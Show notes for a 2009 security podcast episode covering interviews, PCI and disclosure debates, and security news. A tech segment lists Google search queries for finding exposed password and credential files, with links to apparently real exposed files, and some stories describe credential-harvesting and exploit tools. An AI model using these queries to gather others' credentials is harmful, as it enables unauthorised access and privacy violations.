Episode150

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Welcome To PaulDotCom's Episode 150 12 Hour Podcast Extravaganza!

  • Call in information: Skype ID = "pauldotcom"
  • IRC - #pauldotcom | irc.freenode.net
  • Email questions: psw@pauldotcom.com

Introduction, Announcements, & Shameless Plugs (12:00PM - 12:30PM) (Download Audio Here)

  • Sponsors - We've got a deal with SANS! Go to http://pauldotcom.com/sans and sign up for fabulous training and certification! We've also got a deal with Syngress Publishing, go to www.syngress.com and use the discount code "PaulDotCom" for 20% all security titles!

Celebrating PaulDotCom Security Weekly - Episode 150 - April 30, 2009

We're kicking off the 12 hour podcast with some announcements, administrivia, and other musings.

  • April 30th - PaulDotCom Security Weekly Special Edition - Episode 150 - A historic milestone to beer drinkers everywhere! We start recording/streaming at noontime (EDT) and don't stop until midnight! Call lines will be open to share your darkest secrets with 30,000 of your closest friends! Everyone should tune in and participate in the big event!
  • We pour a glass to celebrate winning the Security Bloggers Meetup/RSA Conference's "Social Security Awards - Best Security Podcast category. Contrary to its name (it has nothing to do with our senility), the award recognizes bloggers and podcasts for outstanding work. We weathered the 450+ nominations, a panel of judges from CSO Magazine, Washington Post, Forrester Research, Dark Reading and TechTarget, and STILL managed to pull the win from behind our beer glasses! Thank you to all our listeners for their nominations and for everyone's hard work!

Episode Media

mp3 pt 1

mp3 pt 2

Special Guest: Lenny Zeltser (12:30PM-1:00PM) (Download Audio Here)

Much of security advice under the "best practices" umbrella seems to assume that the company is interested in having strong security or in being a high performer of IT/security practices. Yet, most companies (e.g SMBs) don't care about high performance: they just want to survive and conduct business and to have security that's just good enough.


So, what advice should we offer to companies who will never be proactive about security, who will never implement defense-in-depth, and who maybe don't need to worry about these issues? That's why I've been creating one-page cheat-sheets to assist companies who haven't prepared, yet a stuck in a tough spot.

Here are a few pointers to the write-ups I mentioned:

Security is about outcomes, not about process

SWOT Matrix for Describing Security Posture

How to Suck at Information Security (Paul's Favorite)


Some additional links for better "selling" security to non-security folks:

How to Be Heard in IT Security and Business

Three Laws of Behavior Dynamics for Information Security

Elevator Pitch for Explaining Security Risks to Executives

Listener Call-In & Feedback (1:00PM-3:30PM) (Download Audio Here)

Call into the show and ask us a question! Also, if you've sent us email, we'll be talking about it here. We will also use this timeslot to have a free form discussion about:

  1. Security Certifications - Are they worth it? Which ones have helped your career?
  2. Favorite Operating System - Which Linux distribution do you like the best and why? Do you like Windows, care to defend it?
  3. Wireless Security - Do we have any? What can we do to protect our wireless networks? Also, is it okay to use your neighbors Wifi?
  4. Do as I say -- not as I do - Do security folks send mixed messages to non-security folks by using tools like Twitter, FaceBook, etc?
  5. Emacs vs. VIM - Nuff said.
  6. Pirates vs. Ninjas - Which side do your loyalties lean toward?

Break 3:30PM-4:00PM

  • Setup for the next segment
  • Eat something
  • Blow some stuff up

Roundtable Discussion - PCI Compliance: Good Luck or Good Riddance? (4:00PM-5:00PM) (Download Audio Here)

Panelists:

Questions For Discussion:

  • What elements of PCI really help organizations protect sensitive information?
  • I have been certified as PCI compliant, I'm secure right?
  • Does PCI do more harm than good by giving people a false sense of security?
  • If you could make one improvement to PCI, what would it be?

More Questions From Anton:

  • Prescriptive compliance vs outcome-based compliance
  • Who do you fear more, hacker or auditor?
  • Does risk belong in compliance?
  • Where is value in compliance - in prescribing what to do or in motivating people to do SOMETHING?

Roundtable Discussion - Vulnerability Disclosure: Who Pwns Your Bugs? (5:00PM-6:00PM) (Download Audio Here)

Panelists:

Questions:

  • Should vendors pay researchers for the vulnerabilities they find?
  • Why don't all vendors employ a vulnerability researcher for all their products? Should they be required to?
  • Should there be a penalty to vendors for insecure software?
  • Should all bugs be free, open, and disclosed to the public?
  • If you find a bug, why not just keep it to yourself, build a botnet, rent out the botnet for large sums of money, then move to a warm sunny place?

Storytime With Bob & PaulDotCom (6:00PM-7:00PM) (Download Audio Here)

Join us with special guests "Bob" and the triumphant return of none other than "Twitchy"! If all goes well Twitchy will be live in the studio!!!

Break (7:00PM-7:30PM)

  • Eat some more food
  • Blow some more stuff up

Episode 150 (7:30PM-10:00PM) (Download Audio Here)

PaulDotCom Security Weekly - Episode 150 - April 30, 2009

Announcements

  • Training event in Rhode Island! SANS@Home/Community - SEC517 Cutting-Edge Hacking Techniques - May 11 & 13th 7-10PM use the discount code "PaulDotCom" for a 10% savings - Click here to register now!
  • New sponsor announced (in addition to Cenzic) - This one will be *very* beneficial to the listeners, especially those who like to read...

Special Feature Interview: Stephen Northcutt

Stephen Northcutt - Ex Officio: Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu. Stephen is author/coauthor of Incident Handling Step-by-Step, Intrusion Signatures and Analysis, Inside Network Perimeter Security 2nd Edition, IT Ethics Handbook, SANS Security Essentials, SANS Security Leadership Essentials and Network Intrusion Detection 3rd edition. He was the original author of the Shadow Intrusion Detection system before accepting the position of Chief for Information Warfare at the Ballistic Missile Defense Organization. Stephen is a graduate of Mary Washington College. Before entering the field of computer security, he worked as a Navy helicopter search and rescue crewman, white water raft guide, chef, martial arts instructor, cartographer, and network designer.

Questions:

  1. How did you get your start in information security?
  2. How did you get involved with SANS and how did it become the organization it is today?
  3. Tell us a little about your course, why is it so important for managers to know about security and what kinds of things do they learn in your course?
  4. In the book Geekonomics, David Rice contends that nothing will improve until software and hardware vendors are held accountable for their bugs and vulnerabilities. However, nothing seems to be happening in this arena. What will it take for accountability to land on the shoulders of those who can fix this situation?
  5. While few were expecting regulatory mandates to make InfoSec a harmonious peace filled profession, only the most pessimistic were predicting what actually came to pass - very little change, and resistance at every step of the way. We've seen breaches get bigger, and bigger, but the reaction from the business sector and the public at large has mainly been yawns and heavy punitive damages against the worst offenders while everyone else who's doing the same thing gets off without even warnings. What will it take for the business community to take security seriously and act accordingly?
  6. What advice would he give a young Stephen Northcutt just starting out in his career? Some would say that certifications are just a piece of paper, anyone can write a paper (or get someone to write their paper, or copy and paste from the Internet) What do you say to these people and where should certification fall in your career planning?
  7. Can you share with us some of your advice for traveling? How has one had to change their traveling habits in the face of terrorism and bio-outbreaks such as the swine flu?
  8. When SANS has an Incident (attempt), what do they do/who do they call/what have they seen?
  9. In your opinion, what's the one thing in the Information Security industry that isn't talked about enough? What's the 800 pound gorilla that everyone's trying desperately to avoid mentioning? To further mix metaphors, which emperor has no clothes?
  10. Please list some things that security geeks can do to better sell security to their business? It takes two to tango, and it seems that InfoSec folks aren't getting the funding they need because they can't articulate their needs appropriately. How can we as security professionals raise awareness in an actionable manner?
  11. What's the top 3 things companies can do for their security bottom line?
  12. What are your favorite gadgets/tech toys? lilikoi, mangos, breadfruit, or bananas? What's your favorite fruit to grow on your farm? Favorite beer?

Tech Segment

Google Hacking: Even More

We're looking to take your google hacking to the next level. We love google, because of the things that it can find and give to us. The trick of course is that we need to figure out how to make google give up the goods.

I put the call out for folks to share their google fu. this is what I got back

Viss:

"filetype:cfg password" Turns up stuff like this: https://www-rp.lip6.fr/trac/pfres/attachment/wiki/Entreprise2Gateway1/config_J2300_2007-05-21.cfg

"filetype:xls password" https://gforge.nci.nih.gov/svnroot/caarray2/trunk/qa/docs/Test%20Cases/Regression_Tests/TC2_Login_use_case.xls

This one can even get better: “login: *” “password= *” filetype:xls

returns this: www.adinternational.be/Word/Recruitment_rates.xls


woah: http://bitsnbytes.org/KnowledgeBase/ILS_DC_Passwords/Old%20Password%20List.xls


Montejam: site:google.com filetype:doc "draft" + architecture

TimelessP: http://www.google.co.uk/codesearch?hl=en&lr=&q=^\bsystem\(.*\%24_get.*%24+lang%3Aphp+-escapeshellarg+-escapeshellcmd&sbtn=Search

Nice, gotta love using google code to find vulnerabilities or programming errors.

Some of my favorites: http://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N


www.iabass.com/pics/Combined%20WLP%20.xls


intitle:index.of signons2.txt intitle:index.of signons3.txt

http://fullloon.com/mnfan/2009-xfer/Cookies/Recent/New%20Folder/Application%20Data/Mozilla/Firefox/Profiles/default.ggs/signons3.txt


Stories For Discussion

  1. 2 more Adobe reader vulns - [Larry] - Oh boy, is Adobe PDF the new target? Seems real effective for folks to let into their organizations, as they had been fairly innocuous. Looks like the way to neuter is to disable javascript in the PDF viewer....but really, who uses javascript in PDFs? Need to neuter at the source? Try Didier's PDFiD.
  2. Social Networking for Data Exfiltratrion - [Larry] - Really? Folks are posting sensitive internal docs and revealing internal structure to social networking sites? Now this, I have to see. Sure I can see other info, but not the smoking gun.
  3. Delicious for information gathering - [Larry] Wow, search what everyone had bookmarked. Certainly there can be some ineteresitng terms in URLs, such as usernames and passwords. Not to mention, how many folks bookmark internal resources.
  4. A tutorial for FOCA - [Larry] - Another neat tool for metadata analysis. A great compliment to metagoofil. I've had a few issues with it, such as crashing with large scans, and to me, the interface silt intuitive. At that, the tool works really well on the analysis portion.
  5. Slaying One More Dragon, MS disables Autorun - [PaulDotCom] - Apparently the Conficker wormm, amoung other threats, has forced MS to disable this feature. U3 still works though. I highly recommend people check out software like Device Lock.
  6. Screenshot tool with timestamps - [PaulDotCom] - This sounds great, I love screenshots. In more presentation for the Zen web cast I talked about this, how important screenshots are in your report. Sometimes its the Win3k screensaver, and sometimes its GOLD, like passwords on the screen, etc.. Nice to have the timestamp too.
  7. Do we need AES-256? -[PaulDotCom] - I'll be honest, I didn't read this one all the way through, but if its feasible, wouldn't you want the strongest encryption possible? Just because someone can't break it now, doesn't mean someone won't in the future. Or, how about this, what if someone can break encryption now and just isn't telling anyone.
  8. When DoS is more than a DoS - SCTP remote exploit - [PaulDotCom] - SCTP is a layer 4 protocol, just like TCP, you probably haven't heard about it, or if you did didn't pay much attention. However, did you know its baked into most Linux kernels? Also, did you know that there is a remote exploit out there for it? Also, if you are a non-priveleged user you can run services that support SCTP and then execute a remote expoploit. Check out the withsctp command, it will run commands with SCTP support. Try xinetd, enable small services, and you are off to the races. Many popular tools don't yet support SCTP!

Zombie Stories (10:00PM-12:00AM) (Download Audio Here)

This section will be dedicated to discussing stories that we didn't have time for in other episodes.

We'll be joined for these by:

  • Bill (hevnsnt)
  • Trent (surbo)

Both are from i-hacked.com blog:edge.i-hacked.com

  1. The folly (or greatness) of national jurisdictions - [Mick] - Nothing new here, but can we keep at this forever? Yet another story of attackers hiding behind cloaked security. Until something is done about this, can we be nothing but defenders?
  2. XP support runs out... - [Larry] - Oh, this could get interesting. No more bug fixes in XP (security fixes, yes until 2014), unless you pay for additional support. For 63% of all internet connected computers... So, do you think that there will be some bugs that won;t be classified as security fixes that can lead to getting you owned?
  3. All You Need Is FTP Account Credentials - [PaulDotCom] - Paul Mcartney's web site got hacked. How's they do it? They stole FTP credentials, logged into the site, and added some Javascript to infect visitors. Sexy eh? This is a battle I am familiar with. You can havethe most security web site in the world, written in VI even, with just straight HTML. However, its only as secure as the web developer's credentials. For example, if the web admin logs in from home over FTP, could be game over if their machine is infected by a bot, or there is another bot nearby with the ability to sniff that traffic, or someone gained access to network gear and sniffed traffic. You should be using SSH, with private/public key trusts, protected with pasphrases. That STILL doesn't help the compromised admin/developer workstation, so in the end we come back to user education, policy, and the "softer" side of information security, which ironically, is a lot harder to implement.
  4. - CredCollect for Metasploit - [Larry] - It seems that there is a lot of development into plugins for Metasploit lately (maybe that's why they got shut down?  :-)), and this one is no exception. How about some automation using Priv and Incognito to harvest credentials, stored in formats suitable for cracking later? My favorite line: "The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times." [PaulDotCom] - On credential collecting - I'd like to see this expanded to include applications that store things in the registry (like VNC), or other insecurities. For example, ever do a strings on your OS X keychain? It stores your iTunes share passwords in clear text. Nice huh? This could then be stored in the database and compared to other passwords, or compar usernames. Ultimately it would be nice to keep track of which passwords have been tried on which systems and with which usernames.
  5. Just a few words on GhostNet - [Larry] - Ahh, the smell of monitoring governments with a botnet in the morning! Here's come great coverage on the tool used, Poison Ivy. Even more analysis and papers here.
  6. Checkpoint FW-1 PKI overflow - [Larry] - Interesting disclosure. Tested on a client site (where it apparently caused a crash, and no further testing was possible. Looks like very long http headers caused the crash...
  7. Don't Install MacCinema - [PaulDotCom] - W00t, malware for OS X! Love it. The preinstall and postinstall scripts are obfuscated bash scripts that do evil stuff. Lots of command line kung fu in here! It actually makes entries in your crontab to run the malware. This is pretty easy to detect. Ultimately it downloads another script, which then changes your DNS servers. Pretty lame if you ask me, I would think that creating a kernel extention in OSX would be a MUCH better way to hide and change settings on the fly.
  8. OpenSSL 1.0.0 Beta! - [PaulDotCom] - Took them ten years, but finally reaching 1.0. I just thought that was funny :)
  9. Camera Refurb - [PaulDotCom] - Speaking of cameras, this is a pretty cool hardware hack to bring a camera back to life. Neat!
  10. Independent Attack Discoveries - [PaulDotCom] - Just when you thought that you found a 0day, its not :) Recently Johanna found some problems related to an Intel caching bug, only to find out that others had discovered the bug in 2005. This speaks volumes towards disclosure, if you found a bug, others might have too, so vendors need to fix them!!!